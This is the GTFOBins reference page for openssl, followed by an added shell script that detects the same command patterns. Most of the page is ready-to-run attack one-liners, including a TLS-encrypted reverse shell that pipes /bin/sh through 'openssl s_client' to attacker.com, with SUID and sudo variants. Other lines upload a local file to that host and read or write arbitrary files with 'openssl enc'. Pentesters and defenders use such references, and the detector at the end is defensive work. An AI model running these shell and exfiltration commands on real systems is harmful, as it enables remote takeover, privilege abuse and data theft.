GTFOBins.github.io/_gtfobins/openssl.md
2019-07-29 16:41:49 +02:00

functions
reverse-shell file-upload file-download file-write file-read suid sudo
description:
  To receive the shell run the following on the attacker box:

      openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
      openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

  Communication between attacker and target will be encrypted.
code:
  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
description:
  To collect the file run the following on the attacker box:

      openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
      openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save

  Send a local file via TCP. Transmission will be encrypted.
code:
  RHOST=attacker.com
  RPORT=12345
  LFILE=file_to_send
  openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT < "$LFILE"
description:
  To send the file run the following on the attacker box:

      openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
      openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send

  Fetch a file from a TCP port, transmission will be encrypted.
code:
  RHOST=attacker.com
  RPORT=12345
  LFILE=file_to_save
  openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE"
code:
  LFILE=file_to_write
  echo DATA | openssl enc -out "$LFILE"
code:
  LFILE=file_to_write
  TF=$(mktemp)
  echo "DATA" > $TF
  openssl enc -in "$TF" -out "$LFILE"
code:
  LFILE=file_to_read
  openssl enc -in "$LFILE"
description:
  To receive the shell run the following on the attacker box:

      openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
      openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

  Communication between attacker and target will be encrypted.
code:
  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
code:
  LFILE=file_to_write
  echo DATA | openssl enc -out "$LFILE"
description:
  To receive the shell run the following on the attacker box:

      openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
      openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

  Communication between attacker and target will be encrypted.
code:
  RHOST=attacker.com
  RPORT=12345
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -no_ign_eof -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
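
A defender-side check for the command lines on this page, as an added example that is not part of GTFOBins: it classifies one process command line and flags the quiet `s_client`/`s_server` pipes and the cipherless `enc` copies shown above. It assumes the input is a process's execve arguments joined by spaces (as from auditd or EDR telemetry); the function name, labels and sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not GTFOBins code). Input: one process command line per call,
# assumed to be execve argv joined with spaces (auditd / EDR telemetry).

classify_openssl_cmd() (
    set -f                                  # split on whitespace, no globbing
    seen=0 mode="" quiet=0 connect=0 flags=0 priv=""
    for w in $1; do
        if [ "$seen" -eq 0 ]; then
            case "$w" in
                sudo)              priv=" via sudo" ;;
                openssl|*/openssl) seen=1 ;;
            esac
        elif [ -z "$mode" ]; then
            mode=$w                         # first word after the binary: subcommand
        else
            case "$w" in
                -quiet)   quiet=1 ;;
                -connect) connect=1 ;;
                -in|-out) ;;                # plain file I/O, not a cipher/encoding choice
                -*)       flags=1 ;;        # any other option (-aes-256-cbc, -d, -base64, ...)
            esac
        fi
    done
    if [ "$mode" = s_client ] && [ "$connect" -eq 1 ] && [ "$quiet" -eq 1 ]; then
        echo "ALERT s_client quiet TLS pipe$priv"
    elif [ "$mode" = s_server ] && [ "$quiet" -eq 1 ]; then
        echo "ALERT s_server quiet TLS listener$priv"
    elif [ "$mode" = enc ] && [ "$flags" -eq 0 ]; then
        echo "ALERT enc with no cipher (raw file copy)$priv"
    else
        echo "OK"
    fi
)

# Constructed sample command lines, shaped like the ones on this page.
while IFS= read -r line; do
    printf '%-45s <- %s\n' "$(classify_openssl_cmd "$line")" "$line"
done <<'EOF'
openssl s_client -quiet -no_ign_eof -connect attacker.com:12345
sudo openssl s_client -quiet -no_ign_eof -connect attacker.com:12345
./openssl s_client -quiet -no_ign_eof -connect attacker.com:12345
openssl enc -in file_to_read
openssl enc -aes-256-cbc -pbkdf2 -in backup.tar -out backup.tar.enc
openssl s_client -connect example.org:443 -servername example.org
EOF
```

The rules are heuristics keyed to the exact option combinations on this page, so an `enc` call that adds an encoding option such as `-base64` is reported as `OK` and needs its own rule.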